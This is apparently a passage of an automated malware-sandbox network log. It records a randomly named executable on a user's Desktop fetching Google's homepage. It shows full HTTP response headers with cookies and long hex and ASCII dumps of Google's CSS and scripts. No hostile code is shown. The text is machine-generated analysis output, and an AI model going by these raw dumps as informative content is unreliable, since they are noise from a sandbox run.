                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c
                                                                                                                                                                                                                            Data Ascii: call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absol
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a
                                                                                                                                                                                                                            Data Ascii: om:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67
                                                                                                                                                                                                                            Data Ascii: op:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{backg
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                                                                                                                            Data Ascii: t:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78
                                                                                                                                                                                                                            Data Ascii: solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                                            Data Ascii: ant;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-heig


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            17192.168.2.749718142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-2qGsAhxhefsLuroYU-veJg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-W4cqHCcKvxLrgHK5TLevAoMemViWDxXyzNXAahy3QX3eruKbApeGs; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=N9KMK6CD20oVsr2GDiupVCqu15Sybsk9ExxjCSoiQkehJulVjTCmPDVZKzyU5xP8Ugv-9z3wmIAu6UTD7EBrcX8wdCZT-uRDbTQ51zb40D6NMAnmvAYknpQ5SZPSgttktPeknxoICjOGOeXTsMsbSmQJBYk-EtDicCRlbKgrVB1zBhkBe1RysfYhpp2bl3Z-_fii-HxdwwMqjQ; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC195INData Raw: 34 61 31 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                                            Data Ascii: 4a14<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                                            Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 31 2c 31 33 31 37 2c 34 37 34 2c 38 38 2c 32 31 38 2c 32 37 30 2c 31 35 31 2c 33 36 32 2c 34 38 2c 36 33 33 2c 31 2c 33 38 34 2c 32 2c 36 34 37 2c 33 30 31 2c 31 39 34 2c 32 35 34 2c 31 34 32 2c 34 36 35 2c 32 2c 37 2c 31 2c 31 32 38 2c 36 32 2c 31 39 31 2c 32 32 31 2c 36 38 35 2c 35 31 30 2c 33 32 32 2c 31 37 37 2c 32 2c 37 38 2c 32 33 31 38 2c 33 33 35 2c 31 39 34 2c 34 37 32 2c 31 38 39 2c 37 33 31 2c 36 2c 31 32 32 2c 31 37 2c 33 2c 37 38 31 2c 32 36 36 38 2c 34 34 31 2c 32 33 35 2c 31 36 39 2c 33 2c 33 30 33 2c 31 30 37 2c 36 38 39 2c 39 31 39 2c 31 2c 35 2c 34 2c 34 2c 34 2c 38 37 2c 37 35 2c 33 36 2c 36 39 31 2c 36 34 37 2c 33 2c 32 31 39 2c 34 39 39 2c 31 30 35 2c 32 30 33 2c 33 33 34 2c 31 35 2c 31 2c 31 2c 33 31 36 2c 36 30 32 2c 31 30 33 2c 32
                                                                                                                                                                                                                            Data Ascii: 1,1317,474,88,218,270,151,362,48,633,1,384,2,647,301,194,254,142,465,2,7,1,128,62,191,221,685,510,322,177,2,78,2318,335,194,472,189,731,6,122,17,3,781,2668,441,235,169,3,303,107,689,919,1,5,4,4,4,87,75,36,691,647,3,219,499,105,203,334,15,1,1,316,602,103,2
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29
                                                                                                                                                                                                                            Data Ascii: ;google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this)
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70
                                                                                                                                                                                                                            Data Ascii: script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999p
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74
                                                                                                                                                                                                                            Data Ascii: ty:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74
                                                                                                                                                                                                                            Data Ascii: .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(htt
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73
                                                                                                                                                                                                                            Data Ascii: -top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://s
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e
                                                                                                                                                                                                                            Data Ascii: e;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69
                                                                                                                                                                                                                            Data Ascii: Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;paddi


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            18192.168.2.749720142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-1vdfziNPSVqilr9hHhbYvg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-UPr69_6PmiZkrvmrxvbVVP5R_eTuslOh2aB5VsZQFmr0BKhslP3GY; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=pZpkpHzL3G_NBcU6eKyB-aI2zzB10NDwBMbgCg4rqv9uEbpesHyPt8EuaFV6yJIh3dTAiaIYyrjPdwU7sPbrH4Ex6FCOrItIRJ3mKhEyI5Je5yckrFMwSFWf6zoMbPsv1YUkWSICk7yAS1N4GI7GyoRUf1wEEvtURuGpNAFfPV7XkpjbesgE2GCK2YJi6AFKpTPYr5lG8ESK; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
